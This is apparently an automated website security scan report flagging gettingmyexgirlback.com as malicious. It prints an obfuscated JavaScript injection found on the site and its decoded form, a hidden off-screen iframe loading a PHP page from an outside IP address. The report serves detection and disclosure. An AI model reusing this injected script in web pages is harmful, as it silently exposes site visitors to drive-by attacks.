Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gettingmyexgirlback.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gettingmyexgirlback.com/ | 200 OK Content-Length: 7362 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)

o='//';ni='2.4';ql='a.p';mh='.23';ag='p:';a='fr';wc='htt';m='i';v='hp';xj='0/';c='9.8';da='20';lq='c';q='sr';l='ame';r=m.concat(a,l);i=q.concat(lq);nj=wc.concat(ag,o,da,ni,mh,c,xj,ql,v);document.write('<'+r+' '+i+'="'+nj+'" style="position: absolute; top:-3000px; left:-3000px; visibility: hidden;"></'+r+'>');

Decoded script:

<iframe src="http://202.4.239.80/a.php" style="position: absolute; top:-3000px; left:-3000px; visibility: hidden;"></iframe>

Antivirus reports:
http://mobi-service9.com/redirect.php?r=http%3A//mobi-service9.com/l.php%3Fl%3Do%26r%3D9428%26a%3D29 | 500 Can't connect to mobi-service9.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://mobi-service9.com/test404page.js | 500 Can't connect to mobi-service9.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://chat.hostgator.com/liveperson/ | 200 OK Content-Length: 117 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gettingmyexgirlback.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 04:30:26 GMT
Accept-Ranges: bytes
ETag: "c1c228a-1cc2-4d1f326cbef40"
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4
Content-Length: 7362
Content-Type: text/html
Last-Modified: Sat, 29 Dec 2012 00:49:25 GMT
...7362 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gettingmyexgirlback.com
Referer: http://www.google.com/search?q=gettingmyexgirlback.com
Result:
The result is similar to the first query. There are no suspicious redirects found.